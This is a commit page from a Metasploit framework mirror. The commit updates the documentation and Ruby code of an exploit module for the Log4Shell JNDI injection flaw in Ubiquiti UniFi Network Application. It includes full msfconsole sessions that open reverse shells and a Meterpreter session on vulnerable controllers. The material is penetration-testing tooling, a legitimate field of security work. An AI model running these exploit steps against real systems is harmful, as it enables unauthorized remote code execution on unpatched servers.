dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update docs, note OS X support

This commit is contained in:
Spencer McIntyre 2022-01-20 10:47:11 -05:00
parent ba469a4b2c
commit 579627f5c7
2 changed files with 62 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
documentation/modules/exploit/multi/http/ubiquiti_unifi_log4shell.md
View File

@ -1,7 +1,7 @@
## Vulnerable Application
### Description
The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.
@ -10,7 +10,7 @@ This module will start an LDAP server that the target will need to connect to.
### Setup
1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
3. On step 2, select the button to "Switch to Advanced Setup"
4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
create a local account.
@ -29,16 +29,16 @@ Older versions of the UniFi Network Application can be downloaded from [communit
## Scenarios
### Unifi Controller on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
### UniFi Network Application v6.6.53 on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
TARGET => Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
@ -64,7 +64,7 @@ pwd
/usr/lib/unifi
```
### Unifi Controler on Windows Server 2016
### UniFi Network Application v6.5.53 on Windows Server 2016
```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
@ -104,4 +104,53 @@ Meterpreter : x86/windows
meterpreter >
```
### UniFi Network Application v5.14.22 on OSX 11.2.3
```
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options
Module options (exploit/multi/http/ubiquiti_unifi_log4shell):
Name Current Setting Required Description
---- --------------- -------- -----------
LDIF_FILE no Directory LDIF file path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 111.111.1.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SRVHOST 222.222.2.222 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_zsh):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 222.222.2.222 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run
[*] Started reverse TCP handler on 222.222.2.222:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
[*] Server stopped.
id
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
```
[1]: https://community.ui.com/releases?q=network+application

11
modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
View File

@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(_info = {})
super(
'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.
@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
'SSL' => true,
'WfsDelay' => 30
},
'DefaultTarget' => 1,
'Targets' => [
[
'Windows', {
@ -44,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
],
[
'Linux', {
'Unix', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
@ -85,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
server_version = Rex::Version.new(server_version)
if server_version < Rex::Version.new('5.13.29')
return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
elsif server_version > Rex::Version.new('6.5.54')
return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
elsif server_version > Rex::Version.new('6.5.53')
return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
end
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')